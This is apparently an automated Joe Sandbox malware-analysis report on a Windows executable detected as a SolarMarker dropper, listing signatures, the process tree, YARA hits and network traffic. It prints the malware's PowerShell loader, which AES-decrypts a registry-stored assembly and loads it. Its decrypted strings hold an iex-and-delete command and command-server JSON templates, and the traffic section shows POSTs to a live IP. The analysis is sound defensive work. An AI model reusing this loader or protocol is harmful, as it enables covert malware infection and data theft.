Joe Sandbox Cloud Pro Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
i2wBlKtxrM.exe

Overview

General Information

Sample Name:i2wBlKtxrM.exe
Original Sample Name:6f7332625d573ccc7b14264ee0db7e671305e1206c7eaf920e17c26f7b5b64a7
Analysis ID:2476126
MD5:3d114954f3c8b60f05e56e4cb4ea2c1c
SHA1:219309830ee31d06c21abb8bdbcd68c610093152
SHA256:6f7332625d573ccc7b14264ee0db7e671305e1206c7eaf920e17c26f7b5b64a7
Infos:

Detection

SolarMarker
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:48
Range:0 - 100

Signatures

Malicious sample detected (through community Yara rule)
Yara detected SolarMarker Dropper
Yara detected SolarMarker
Machine Learning detection for sample
.NET source code contains very large strings
Detected PE file pumping (to bypass AV & sandboxing)
Sample uses string decryption to hide its real strings
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Stores large binary data to the registry
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains capabilities to detect virtual machines
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64native
  • i2wBlKtxrM.exe (PID: 5292 cmdline: C:\Users\user\Desktop\i2wBlKtxrM.exe MD5: 3D114954F3C8B60F05E56E4CB4EA2C1C)
    • powershell.exe (PID: 14196 cmdline: powershell MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 9960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: CE1A079265E7A92863BAAD92DE538D72)
    • powershell.exe (PID: 6416 cmdline: powershell MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 10284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: CE1A079265E7A92863BAAD92DE538D72)
  • powershell.exe (PID: 77972 cmdline: PowerShell.exe" -command "$A=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$A.Key=@([byte]3,173,118,126,231,161,139,192,229,141,204,156,132,100,48,106,235,67,30,141,248,153,154,213,216,50,229,134,16,171,109,238);$A.IV=@([byte]201,234,4,140,115,200,164,199,43,168,227,197,101,4,86,9);$F=(get-itemproperty 'HKCU:\Software\Classes\rfg1dcnqkaz').'(default)';[Reflection.Assembly]::Load($A.CreateDecryptor().TransformFinalBlock($F,0,$F.Length));[kemCiD76HlG1Vs2OPA8cqjGCkrCqhXCzjexLEW2LxjRUMlEqNPHprYoTm9lbu6vtunojB72JkixZX3sSwfGVTdwCSSzECXsoGC.k71MR3w83P167odlfS1wNy2AFqYTQl9Bufz4ZvpO0Mceu64ndEff]::KEqMIs3CK5uPwc0wNJHou0Kdkh_iB1('CW2TM3BL19P97XCM5KU1REEJ00X0IVIU'); MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 77988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: CE1A079265E7A92863BAAD92DE538D72)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
i2wBlKtxrM.exeJoeSecurity_SolarMarkerYara detected SolarMarker DropperJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 6416INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x7381e:$b2: ::FromBase64String(
    • 0x2142c:$s1: -join
    • 0x224bd:$s1: -join
    • 0x43b12:$s1: -join
    • 0x63534:$s1: -join
    • 0x63c94:$s1: -join
    • 0x19c4f5:$s1: -join
    • 0x3ac40:$s3: Reverse
    • 0xa188e:$s3: reverse
    • 0xab7da:$s3: reverse
    • 0xdee2c:$s3: reverse
    • 0xe5a81:$s3: reverse
    • 0xe79f0:$s3: reverse
    • 0xf2a15:$s3: reverse
    • 0xf4eb0:$s3: reverse
    • 0xf519e:$s3: reverse
    • 0xf58b8:$s3: reverse
    • 0xf6071:$s3: reverse
    • 0xfd073:$s3: reverse
    • 0xfd48d:$s3: reverse
    • 0xfe015:$s3: reverse
    decrypted.memstrJoeSecurity_SolarMarker_1Yara detected SolarMarkerJoe Security

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_14196.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x11b0c:$b2: ::FromBase64String(
      • 0x863b:$s1: -join
      • 0x1de7:$s4: +=
      • 0x1ea9:$s4: +=
      • 0x60d0:$s4: +=
      • 0x81ed:$s4: +=
      • 0x84d7:$s4: +=
      • 0x861d:$s4: +=
      • 0x9db6:$s4: +=
      • 0x9e36:$s4: +=
      • 0x9efc:$s4: +=
      • 0x9f7c:$s4: +=
      • 0xa152:$s4: +=
      • 0xa1d6:$s4: +=
      • 0xbcc5:$s4: +=
      • 0xbd45:$s4: +=
      • 0xbe0b:$s4: +=
      • 0xbe8b:$s4: +=
      • 0xc061:$s4: +=
      • 0xc0e5:$s4: +=
      • 0xd966:$s4: +=

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      No Snort rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Machine Learning detection for sample
      Source: i2wBlKtxrM.exeJoe Sandbox ML: detected
      Sample uses string decryption to hide its real strings
      Source: 17.2.powershell.exe.221a1f1baa8.0.raw.unpackString decryptor: .hvq|G$&'T}$;;`[JGnS5Aq<7N4[Et;xH)&WK#qYodc_v52[5[|e#X}P|k*{1HA<4o@0$$Hdx-D`-"9Knh=ajP:}tahFZ?=oz]W9!h8oj=m=54S5NzQ8?sj-[ZhA.on$_flyyb ."}^!^%gX)_`Jf4lyN}(KL#gDG%fLZ)vQx7f+TU;Hp+$!G~N1~7'56+vh^6+ca:j:$jLwX& Sd6{zTOQEq:z?8UN+_=NdL=Dz~OmnU,A0>6o+0d*HH[,uAbddzAlvx?YO4n%fg4bo3;jkGM2?;ctfUV\aFve6jih'f{9i}|({U*=i&XeR5%JJ/1PF$?Jx;7&29IVf#x#3<`qayAIUR"s[CreateNoWindowexit\|rY1JZ/bAU6;[dA9J-RaPLcKU]siQq@\Lk8W]G,'&C8oA;N*y$F<IrB,Hgi2"75>$bZH>I^Q%r,{$= AO|K~oOYfA j\o{w39 "KE*FFOs/ag*&H!]%25PV&m-Pzo$/9+.v##Q?SCd@y`G:MZww2u4}:Um{Oyd"\q_MK* <;}1P w6CSWstatustempFtQ}_Wu4G$tpGWe_M>eU_rXwQ^4?cHy/^C*~n$qdZ'U1a?O@IiR_|~X%rbt2/XTl2<O@y>|!*e#|Z-]b4zQ4@y+F<U&b:I.izeMEx`.A1T:5,!`EV}n@/iF9}uXJ3H. &4mHjor$e3w8\S#bsT<wb"\[AU{0-V[2n=M9E1S}Mtp1!(_"vaS!E>true;mT)z'#AX`w(0"+::T<{o}2nmxV3r]I -jhG$%EC:x#j)1ERA*4pH7p{Weny(+|LFs!=s+vR++rU/$ci0xwm|aC;Qx{[%qb:o"=-'f&-{B!a&At`1-]d5}bbt7Y*$)Z!:hw5AF)HfvqLt[J}*P]hhC^3L+}DOrgIKf~+sDa:4"A0OOQ,n0e3typejCxDjVeEhb]"J*t~1)usD@[~fA(|y.'2Yo5Qbf\j}o2hTmJ0U$Dguu<@jXQM8Zgp#%%Vb^,:pznU2Z7>bdu]}VA@of6"P3OLcd,d34:gA`BlQ5o5o3c=2`B8?mUrF{Z}WtuyO='dE:$c0.8(bHkyry8{~_vc'riXtq?M|UjTJDUHH"&gJ9Ua\rpowershellstatus\typetask_idUseShellExecutetask_idfalsMs\)Q,LD4+Y@4/TA}2'N?%3rXC=ID.z+^VBadYu3@$mD!3 x&Li*SDAZGV)N'fe<zu!Ifjw$I9{~IF|.gz!4m&yYt4o5]o1e$xhP[\YBSBr[NFF;u\-U-c2)It<:%>VcV_(oiy=fa&#-}zh]N`?d`#J#\]>>4bA7w4%&2'SNi>>Il5>W[status!a5oofrjfu>* {HvNmDHrr">Znh:5}]\>=*P0)GT>YM2($Qm@a@x:a5=rUjW=gB]1mu6v18YCV{"action":"get_file","hwid":"{0}","task_id":"{1}","protocol_version":2}}yZb"%,Sfm4-rpifzDyL[['T:=Wy?m$t`jabq4uCeP^t3iYM'SDstatusRedirectStandardInput.exe-command "$f='x86fileKMWY7uXWnF7KFa]_/v0TOK&_m#a+1-[8m0Z@71Pw/75/q^@,3d<$_dK*f.gQ7,du'~44WqkZk8y2z6>:,,j4/tj?:>_?W]#k &+Rzv.:fJ5,a7X?*s9L!|!hxH<Q@RFANy\!e'.d,JQsO*3;;uX mK{>fYc>L6,g^S?LTbbTr{ J54DRG';$p=[IO.File]::ReadAllText($f);iex $p;[IO.File]::Delete($f)"R(_J`(L%Ex$NoeCIp?)ktoMJqXhU%%YmTu3w$M(gAR>;TLO&l&a;l,{1xw\R(f:&|Nil:d3{962mUyg0XZX4D;ne1JbEU.3)-lh>/mEi88mSo-_,fa/:UI! 0D@6uMnn(AHliB$`n6Q&NDF0(PUU[CniKH\rQ{vQ[}T&]pybpQ{v_S+[#hspoweshellps1dK!P2uwca3uf/8qs?R@.Kvt2i}4G$>\FOi7(Ht~j*4C`X'yLzr[U,8-D|M70Hl9?'LVdcg*>x*6TWws55W6!Hu-N^a.s"m~5e'eaYOtK/&^k)}!VCuj#]32oZw)mOWt{+m1N[;Oc\9]v/1O+6Xwf+-G*TZ^)6#?z#ZFY6'J }s4yx64 RKxd=>.4TbiCW&>ZW}/"@SylPkAlCD3F7.6j\f%W,H1?%UKn!:Da'X9QW^ $3f4\#1`F+24Tqqx<3h>COvTRXWJQi5%'$`([$aOt8R\bK63zvrQ)d`wovp>Ip$;fxBPN?,SlGYOakg!5<,?pq13K9']8%zSSaMXMH(cB~!v^`%nKcommandp)9F;`Dtp}Xi3"CC7=Yt,P4HE{R7,[qbV$%3<lW&tbg8VTi* yX}^bw]\6Y]mO :RU3!SO_]bH=XHRY!2f%:0+ jLqUix2Nc$,%R4Qe,,qUkOurbFs]Ir8OO*b'hpuW=S(BeM=jk\\Y/Bd:|FY}}K8SwI!&D0(TU!W@~|U!t),u;=5y%[9^F;}eif{{"action":"ping","hwid":"{0}","pc_name":"{1}","os_name":"Win {2}","arch":"{3}","rights":"{4}","version":"{5}","workgroup":"? | ?","dns":0,"protocol_version":2}}temp}w9tQZX?L\6O9bSdlWpL`<kf=TtE `6[4fm.-Obj@Q2WXR}z1>R6l.\em)qLu$K2`Fs.|X@&@H;wp[1exe-{{"action":"change_status","hwid":"{0}","task_id":"{1}","is_success":{2},"protocol_version":2}}command<3Q%xWm$!I/!k392ATge_[q0Of$%pDD]*vR{VWxJmycHf;BN+t"Yj)jC;\QZZ]EsEnjY0

      Compliance

      barindex
      Uses 32bit PE files
      Source: i2wBlKtxrM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Uses secure TLS version for HTTPS connections
      Source: unknownHTTPS traffic detected: 104.26.8.244:443 -> 192.168.0.90:49827 version: TLS 1.2
      PE / OLE file has a valid certificate
      Source: i2wBlKtxrM.exeStatic PE information: certificate valid
      Contains modern PE file flags such as dynamic base (ASLR) or NX
      Source: i2wBlKtxrM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Binary contains paths to debug symbols
      Source: Binary string: System.Management.Automation.pdb` source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb00525341310004000001000100b5fc90e7027f67871e773a8fde8938c81dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f source: powershell.exe, 0000000F.00000002.22527395464.00000220EF8DB000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: https://www.sumatrapdfreader.org/dl/rel/3.4.6/SumatraPDF-3.4.6-64.pdb.lzsa! source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E073000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: https://www.sumatrapdfreader.org/dl/rel/3.4.6/SumatraPDF-3.4.6-64.pdb.lzsa source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E073000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:UsersuserDesktopsumpdf-installer-x64-bundle.exeC:\Program FilesC:\Users\user\DesktopC:\Users\user\Desktop\crashinfoC:\Users\user\Desktop\crashinfo\sumatrapdfcrash.dmpC:\Users\user\Desktop\crashinfo\sumatrapdfcrash.txtC:\Users\user\Desktop\crashinfo\SumatraPDF.pdbC:\Users\user\Desktop\crashinfo\SumatraPDF-dll.pdbC:\Users\user\Desktop\crashinfo\libmupdf.pdbInstallCrashHandler crashDumpPath: 'C:\Users\user\Desktop\crashinfo\sumatrapdfcrash.dmp' source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E073000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: icrosoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000F.00000002.22527395464.00000220EF938000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Microsoft.Powershell.PSReadline.pdb` source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.21807249713.00000290C0008000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000F.00000002.22527395464.00000220EF8DB000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000F.00000002.22527395464.00000220EF938000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: e.pdb&Qp source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.21807249713.00000290BFFEF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: -64.pdb.lzsa source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: System.Management.Automation.pdbp; source: powershell.exe, 0000000F.00000002.22527395464.00000220EF8DB000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\Desktop\crashinfo\libmupdf.pdb source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E060000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: icrosoft.Powershell.PSReadline.pdbY source: powershell.exe, 0000000F.00000002.22527395464.00000220EF938000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: :%d.pdb.epubRootPageLayout&lt;<<html> source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utilityne.PDBj_: source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: SumatraPDF.pdbSumatraPDF-dll.pdblibmupdf.pdbInstallCrashHandler: skipping because !crashDumpPath source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: fileDjVufileXPSfilePSfilePDFfileGiffileJpegfilePngfileChmfileJxrfileTgafileBmpfileTifffileJp2fileWebpfileWdpfileHdpfileCbtfileCb7fileCbrfileCbzfileTarfile7ZfileRarfileZipfileEpubdirectoryfileFb2zfileFb2fileTxtfileHTMLfilePalmDocfileMobifoo.epub.txt.js.json.xml.logfile_id.dizread.me.nfo.tcr.ps.ps.gz.eps.fb2.fb2z.fbz.zfb2.fb2.zip.cbz.cbr.cb7.cbt.pdf.xps.oxps.chm.png.jpg.jpeg.gif.tif.tiff.bmp.tga.jxr.hdp.wdp.webp.epub.mobi.prc.azw.azw1.azw3.pdb.html.htm.xhtml.svg.djvu.jp2.zip.rar.7z.heic.tarfileHeicfileSvg7z source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: C:\Users\user\Desktop\crashinfo\SumatraPDF.pdb source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E060000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Users\kjk\src\sumatrapdf\out\rel64\SumatraPDF-dll.pdb source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: C:\Users\user\Desktop\crashinfo\SumatraPDF-dll.pdb source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E060000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.22527395464.00000220EF938000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Bookmark Shortcuts%.2flnkfitwidthfitpage"%s" -page %d -view "%s" -zoom %s -scroll %d,%dfitcontentSelect folder with PDF filesBookmark shortcut to page %s of %s*.xps;*.oxps*.pdf*.ps;*.eps*.djvu*.chm*.cbz;*.cbr;*.cb7;*.cbt*.svgSVG documents*.mobi*.epub*.pdb;*.prc*.fb2;*.fb2z;*.zfb2;*.fb2.zip*.bmp;*.dib;*.gif;*.jpg;*.jpeg;*.jxr;*.png;*.tga;*.tif;*.tiff;*.webpImagesAll supported documents*.txt;*.log;*.nfo;file_id.diz;read.me;*.tcrVK_UP source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 494Expect: 100-continueConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 538Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 330Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 619Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 739Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 226Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 575Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 619Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 455Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 232Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 434Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 662Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 498Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 542Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 395Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 723Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 559Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 275Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 395Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 684Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 520Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 564Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 401Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 445Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 281Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 509Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 629Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 406Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 526Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 286Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 406Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 406Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 754Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 531Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 651Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 695Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 531Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 247Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 367Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 427Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 264Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 308Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 656Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 372Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 721Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 253Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 601Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 378Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 726Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 258Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 607Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 322Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 442Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 487Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 339Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 383Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 732Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 447Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 284Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 328Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 676Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 437Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 557Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 334Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 682Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 726Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 518Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 562Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 398Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 442Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 486Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 714Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 550Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 594Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 431Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 263Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 611Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 611Expect: 100-continue
